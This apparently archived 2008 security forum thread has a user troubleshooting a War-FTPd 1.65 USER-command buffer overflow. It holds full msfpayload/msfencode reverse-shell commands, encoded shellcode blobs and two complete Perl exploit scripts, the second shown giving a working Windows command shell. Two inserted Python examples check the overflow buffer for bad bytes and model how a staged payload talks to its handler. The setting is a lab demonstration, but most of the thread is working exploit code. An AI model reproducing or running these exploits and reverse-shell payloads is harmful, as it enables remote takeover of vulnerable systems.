This topic has 4 replies, 4 voices, and was last updated 12 years, 6 months ago by RoleReversal.

July 10, 2008 at 5:30 am #2627
apollo (Participant)

I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue. Hopefully someone can tell me where I went wrong in this process.
The exploit I wanted to demo was warftpd 1.65, since there's a whole lot of stuff out there on it already. Looking at the metasploit module exploit/windows/ftp/warftpd_165_user I find that
'BadChars' => "\x00\x0a\x0d\x40",
'Ret' => 0x71ab1d54 # for XP SP0
Now, using the msf tools, I generate the exploit code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 205
"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";
and then I incorporate all of that into the Perl exploit:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.50.128",
    PeerPort => "21",
    Proto    => "tcp",
) or die "connect failed: $!";

my $trash = <$sock>;    # read the FTP banner
# 485 bytes of filler, the return address (0x71ab1d54, little-endian),
# 115 bytes of padding, then the msfencode -t perl output (staged payload)
my $str = "USER " . "A" x 485 . "\x54\x1d\xab\x71" . "\x41" x 115;
$str .= "\x29\xc9\xb1\x2d\xda\xc5\xb8\x0b\xe6\x4f\x25\xd9\x74\x24" .
"\xf4\x5e\x31\x46\x15\x03\x46\x15\x83\xc6\x04\xe9\x13\xb3" .
"\x4f\x06\x9c\xa4\x69\x27\xdc\xca\xea\xe6\xf8\xbe\x96\x34" .
"\x74\xbc\x55\x3c\x8b\xd2\x2d\xeb\xab\x2d\xd8\x98\x98\xb7" .
"\x1d\x70\xd1\x07\x84\x20\xd3\x42\xba\x39\x16\xd6\x05\x4c" .
"\x60\x94\xe3\x97\x46\x6e\x0f\xac\xdd\xde\xeb\x33\x0b\x86" .
"\x78\x2f\x92\xcc\x30\x53\x25\x3a\xcd\x47\xbc\x35\xbe\xb3" .
"\xa2\x24\xc0\x5b\xeb\x7d\x5a\x10\x4f\xb2\x28\x66\x5c\x39" .
"\x5e\x7a\xf1\xb6\xf7\x8a\x57\xaf\x54\xec\x0f\x1c\x69\x98" .
"\xb8\x11\xbf\x07\x13\xb0\x06\xc5\xfb\xc3\xaf\xbc\xaf\x68" .
"\x03\xed\x0c\xdc\xe0\x42\x1a\x05\x80\xe5\xf3\xc2\x4f\xb2" .
"\x58\xb5\xf6\xdb\x80\xc6\xdf\x45\x86\x91\x8f\x76\x2e\x76" .
"\x27\x48\x67\x4b\x39\x2e\x10\xbd\x65\xc8\xb3\x34\x76\x7e" .
"\x24\x14\x2e\x18\xfd\xcd\xd5\x1b\x2b\xa1\x61\xef\x84\x11" .
"\xdd\xbc\x42\x2f\x21\x7a\x74\xa9\xa8";
print $sock $str . "\r\n";    # USER command carries the whole buffer
$trash = <$sock>;
print $sock "pass test\r\n";
The exploit is launched when I run it, my listener gets a connection back, however it doesn't appear that cmd.exe is ever spawned, and as soon as I send anything on the connection back the application crashes. When I do it from within metasploit it works great, so I feel comfortable that this is something that I'm doing wrong.
Thanks in advance for any insight.
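As an added example (this is not code from the original post and not Metasploit's own code), here is a Python checker for the pieces the script above assembles by hand: it parses the Perl string literal that msfencode -t perl prints back into raw bytes, packs the module's Ret little-endian and confirms it matches the "\x54\x1d\xab\x71" in the script, builds the USER buffer in the same 485 + 4 + 115 + shellcode layout, and scans the whole thing against the module's BadChars (0x00, 0x0a, 0x0d and 0x40, which is '@'). The sample blob is the first three lines of the msfencode output quoted in the post; the tainted sample, the 'USER ' framing check and all function names are constructions for this example.

```python
"""Sanity-check a USER-command overflow buffer before sending it.

Added example, not code from the thread. Offsets 485/115 and the Ret and
BadChars values are the ones quoted in the post; everything else here
(helper names, samples, checks) is an assumption made for this example.
"""
import re
import struct

BADCHARS = b"\x00\x0a\x0d\x40"   # 'BadChars' as quoted from the module; 0x40 is '@'
RET = 0x71AB1D54                 # 'Ret' as quoted from the module (XP SP0)
FILLER_LEN = 485                 # bytes before the saved return address, per the post
NOP_SLED_LEN = 115               # bytes between the return address and the shellcode

# Sample input: the first three lines of the msfencode -t perl output in the
# post (42 bytes), in the exact textual form msfencode prints.
SAMPLE_PERL = r'''"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a";'''

# Constructed sample with a bad byte (0x0a) smuggled into the second line.
TAINTED_PERL = r'''"\xd9\xe1\x33\xc9" .
"\x0a\x74\x24\xf4";'''

_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_perl_shellcode(text: str) -> bytes:
    """Turn msfencode's Perl literal ("\\xHH..." . "..." ;) back into raw bytes."""
    return bytes(int(h, 16) for h in _HEX.findall(text))


def find_badchars(data: bytes, badchars: bytes = BADCHARS) -> list:
    """Return (offset, byte) for every bad byte present; an empty list means clean."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def pack_ret(ret: int) -> bytes:
    """Little-endian x86 return address, as it must appear in the buffer."""
    return struct.pack("<I", ret)


def build_user_buffer(shellcode: bytes, filler: bytes = b"\x90") -> bytes:
    """Assemble USER <filler><ret><NOP sled><shellcode>CRLF in the post's layout."""
    body = filler * FILLER_LEN + pack_ret(RET) + b"\x90" * NOP_SLED_LEN + shellcode
    return b"USER " + body + b"\r\n"


def check_user_buffer(buf: bytes, badchars: bytes = BADCHARS) -> list:
    """Scan everything after 'USER ' and before the terminating CRLF for bad bytes.

    The trailing CRLF is the command terminator and is expected; any NUL,
    stray newline or '@' inside the argument would cut or mangle it before
    it ever reaches the vulnerable copy.
    """
    if not (buf.startswith(b"USER ") and buf.endswith(b"\r\n")):
        raise ValueError("buffer is not a USER command terminated by CRLF")
    return find_badchars(buf[5:-2], badchars)


def ret_offset(buf: bytes) -> int:
    """Position of the packed return address inside the full buffer."""
    return buf.index(pack_ret(RET))


if __name__ == "__main__":
    sc = parse_perl_shellcode(SAMPLE_PERL)
    print("shellcode bytes:", len(sc), "bad bytes:", find_badchars(sc))
    print("ret packed:", pack_ret(RET).hex())
    buf = build_user_buffer(sc)
    print("buffer bytes:", len(buf), "ret at offset:", ret_offset(buf),
          "bad bytes:", check_user_buffer(buf))
    print("tainted sample:", find_badchars(parse_perl_shellcode(TAINTED_PERL)))
```

Run it against the full 205-byte blob and the parser's byte count should equal the "final size" msfencode reported; if it does not, the paste is damaged. The bad-character scan is done on the assembled buffer rather than only on the shellcode, because the filler and the return address bytes are subject to the same constraints.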
July 11, 2008 at 2:25 am #18830
apollo (Participant)

I figured I'd post back my solution in case anyone was interested, or in case anyone finds this via Google (I was surprised that when I searched for msfencode and 2008 after < 24 hrs this was like the 5th entry on Google). I'm not sure why I didn't think about it, but the multi-stage payload was the problem. When I switched to using a single-stage payload, that fixed the problem.
I punted and went and built the payload in executable form:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 x > exp.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 177
Options: exitfunc=process,lhost=192.168.50.129,lport=4444
But when I went to run exp.exe on the vulnerable machine, it crashed, which is what brought me back to the single stage. Anyway, I got success with the windows/shell_reverse_tcp payload.
~/metasploit$ ./msfpayload windows/shell_reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -s 414 -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 315
"\xd9\xe1\x33\xc9\xd9\x74\x24\xf4\xb1\x49\x5a\xbf\x33\x3a" .
"\x88\xc8\x31\x7a\x17\x83\xea\xfc\x03\x49\x29\x6a\x3d\x51" .
"\x27\x81\xf3\x41\x41\xaa\xf3\x6e\xd2\xde\x60\xb4\x37\x6a" .
"\x3d\x88\xbc\x10\xbb\x88\xc3\x07\x48\x27\xdc\x5c\x10\x97" .
"\xdd\x89\xe6\x5c\xe9\xc6\xf8\x8c\x23\x19\x63\xfc\xc0\x59" .
"\xe0\xfb\x09\x93\x04\x02\x48\xcf\xe3\x3f\x18\x34\x24\x4a" .
"\x45\xbf\x6b\x90\x84\x2b\xf5\x53\x8a\xe0\x71\x3c\x8f\xf7" .
"\x6e\xc1\x83\x7c\xf9\xa9\xff\x9e\x9b\xf2\x31\x44\x3f\x7f" .
"\x72\x4a\x4b\x3f\x79\x21\x3b\xa3\x2c\xbe\xfc\xd3\x70\xa9" .
"\x72\xad\x82\xc5\xdb\xce\x4d\x73\x8f\x56\x1a\x4f\x1d\xfe" .
"\xad\xdc\x53\xa1\x05\xdc\x44\x35\x6d\xcf\x99\xfe\x21\xef" .
"\xb4\x5f\x4b\xea\x5f\xde\xa6\xfd\x9d\xb5\x52\xfc\x5e\xe5" .
"\xcb\xd9\xa8\xf0\xa1\x8d\x55\x2c\xea\x62\xf9\x83\x4e\xd6" .
"\xbe\x70\xae\x08\x28\xb6\xf8\x9b\x28\x50\x91\xca\x76\xfa" .
"\x32\x64\x67\x97\xdd\x9a\x91\x3d\x7d\x34\x9d\x97\x14\xaa" .
"\x30\x42\x16\x1a\xd4\x06\x8c\xfd\x71\xb5\x21\x68\xd2\x60" .
"\x93\xa0\x5b\x75\x89\x7c\xd5\x9b\x7f\xbd\x16\xf1\x15\xb4" .
"\x24\xfb\x54\xea\x28\x41\x75\x79\xae\x7d\x2e\x2a\xe4\x15" .
"\x42\xd3\x48\xf3\x5d\x5e\x87\x04\x77\xfa\x80\xa8\x29\xac" .
"\x7f\x26\xcb\x1f\xd1\xe3\x9a\x60\x01\x63\xb0\x46\xa7\xbd" .
"\x99\x87\x7e\x2b\xe1\x87\x48\x54\xcd\x10\x50\xd3\x28\x99" .
"\x61\x56\xb1\xa5\x48\x67\xce\xa5\x8a\x47\x59\x28\xad\x85" .
"\xe9\x87\xb2\x9f\xf1\xf8\x47";
Which brought me back to the final code, which worked:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.50.128",
    PeerPort => "21",
    Proto    => "tcp",
) or die "connect failed: $!";

# 485-byte NOP filler, the return address (0x71ab1d54, little-endian),
# a 115-byte NOP sled, then the single-stage windows/shell_reverse_tcp shellcode
my $str = "USER " . "\x90" x 485 . "\x54\x1d\xab\x71" . "\x90" x 115;
$str .= "\xb8\x84\x3b\x15\xf2\xda\xdb\xd9\x74\x24\xf4\x31\xc9\xb1" .
"\x49\x5a\x83\xea\xfc\x31\x42\x0e\x03\xc6\x35\xf7\x07\x3a" .
"\x23\x1c\xaa\x2a\x4d\x1d\xca\x55\xce\x69\x59\x8d\x2b\xe5" .
"\xe7\xf1\xb8\x85\xe2\x71\xbe\x9a\x66\xce\xd8\xef\x26\xf0" .
"\xd9\x04\x91\x7b\xed\x51\x23\x95\x3f\xa6\xbd\xc5\xc4\xe6" .
"\xca\x12\x04\x2c\x3f\x1d\x44\x5a\xb4\x26\x1c\xb9\x1d\x2d" .
"\x79\x4a\x02\xe9\x80\xa6\xdb\x7a\x8e\x73\xaf\x23\x93\x82" .
"\x44\xd8\x87\x0f\x13\xb2\xf3\x13\x45\x89\xcd\xf0\xe1\x86" .
"\x6d\x37\x61\xd8\x7d\xbc\x05\xc4\xd0\x49\xa5\xfc\x74\x26" .
"\xa8\xb2\x86\x5a\xe4\xb5\x41\xc4\x56\x2f\x06\x3a\x6b\xc7" .
"\xa1\x4f\xb9\x48\x1a\x4f\x6d\x1e\x69\x42\x72\xe5\x3d\x62" .
"\x5d\x46\x37\x79\x04\xf9\xaa\x8a\xcb\xac\x5e\x89\x34\x9e" .
"\xf7\x54\xc3\xeb\xa5\x30\x2b\xc5\xe5\xed\x80\xba\x4a\x41" .
"\x64\x6f\xb2\xb5\x02\x4f\xe4\x04\x52\x29\x9d\x79\x08\xd3" .
"\x0e\xf3\x51\x8e\xd9\xef\x6b\x1a\x79\xa7\x74\x8c\x10\x57" .
"\xda\x65\x1a\x87\xba\xef\x80\x4e\x2b\x8c\x25\xe5\xfb\x0b" .
"\x9f\x35\x72\x4c\xb5\x81\x0c\x70\x7b\xca\xfc\xde\xe9\x43" .
"\xff\xe0\x50\x79\xfe\x5e\x79\x0c\x84\x66\x2a\xa5\xd2\xfe" .
"\x5e\x44\x97\xe8\x61\xcd\xf0\xeb\x48\x75\x56\x41\x24\xdb" .
"\x09\x0f\xc7\x8a\xf8\x9a\x96\xd3\x2b\x4c\xb4\xf5\xc9\x42" .
"\x95\xfa\x04\x30\xe5\xfa\x9e\x3b\xc9\x6d\x06\xba\x2c\x14" .
"\x37\x49\xb5\x18\x11\x4e\xc2\x1a\x61\x60\x45\x9d\x46\x62" .
"\xe5\x32\x88\xb4\xf5\x65\x7c";
print $sock $str . "\r\n";    # USER command carries the whole buffer
and then... tada!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\War-ftpd>
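As an added example (not code from the thread and not Metasploit's own code), the following Python models the two sides of the conversation that a staged reverse_tcp payload has with its handler, which is the piece a bare netcat listener never supplies. The wire format modelled here, a 4-byte little-endian length followed by the second stage, is this editor's understanding of the stager and is an assumption of the example, not something the post states; the 1 MiB sanity limit, the socketpair plumbing and all function names are constructions for the example. The stand-alone windows/shell_reverse_tcp payload that fixed the problem carries the shell with it and needs none of this.

```python
"""Model of a staged reverse_tcp handshake: why a bare listener gets no shell.

Added example, not from the thread. Stager wire format (LE32 length, then
stage bytes) is assumed for this model. A handler that sends the stage
gets a working second stage; a listener that sends nothing leaves the
stager blocked, and anything typed at it is misread as the length field.
"""
import socket
import struct
import threading

MAX_STAGE = 1 << 20  # assumed sanity limit: refuse absurd lengths instead of allocating them


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise ConnectionError on early close."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError(f"peer closed after {len(buf)}/{n} bytes")
        buf += chunk
    return bytes(buf)


def serve_stage(sock: socket.socket, stage: bytes) -> None:
    """Handler side: push <LE32 length><stage>. A plain nc listener never does this."""
    sock.sendall(struct.pack("<I", len(stage)) + stage)


def stager_receive(sock: socket.socket) -> bytes:
    """Stager side (modelled): read the length, then that many bytes of stage."""
    (length,) = struct.unpack("<I", recv_exact(sock, 4))
    if length > MAX_STAGE:
        raise ValueError(f"length {length:#x} ({length} bytes) is not a plausible stage")
    return recv_exact(sock, length)


def length_if_typed(text: bytes) -> int:
    """The 'stage length' the stager would see if a human typed `text` at it."""
    return struct.unpack("<I", text[:4])[0]


def roundtrip(stage: bytes) -> bytes:
    """Handler and stager over a local socketpair; returns what the stager received."""
    handler, stager = socket.socketpair()
    t = threading.Thread(target=serve_stage, args=(handler, stage))
    t.start()
    try:
        return stager_receive(stager)
    finally:
        t.join()
        handler.close()
        stager.close()


def typed_command_outcome(text: bytes) -> str:
    """Simulate typing a command into a bare listener connected to a stager."""
    handler, stager = socket.socketpair()
    try:
        handler.sendall(text)
        handler.shutdown(socket.SHUT_WR)   # the human sends nothing more
        try:
            stager_receive(stager)
            return "stage accepted"
        except ValueError as exc:
            return "rejected: " + str(exc)
        except ConnectionError as exc:
            return "short read: " + str(exc)
    finally:
        handler.close()
        stager.close()


if __name__ == "__main__":
    stage = b"\xcc" * 1000          # stand-in for the real second stage
    print("handler present:", len(roundtrip(stage)), "stage bytes delivered")
    print("typed 'dir':", hex(length_if_typed(b"dir\r\n")), "->",
          typed_command_outcome(b"dir\r\n"))
    print("typed blank line ->", typed_command_outcome(b"\r\n"))
```

The "typed 'dir'" case is the symptom from the first post: the connection arrives, nothing is printed, and the first keystrokes are consumed as a length field (here rejected by the model's sanity limit; a real stager has no such limit and simply misbehaves). With msfconsole's handler the length and stage are sent automatically, which is why the same payload worked from inside metasploit.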
July 11, 2008 at 3:05 am #18831
KrisTeason (Participant)

Nice work.
July 11, 2008 at 3:35 am #18832
Anonymous (Participant)

That makes sense, since there was no payload handler in place.
July 11, 2008 at 7:23 am #18833
RoleReversal (Participant)

Nicely done Apollo, and thanks for posting the solution as well as the problem.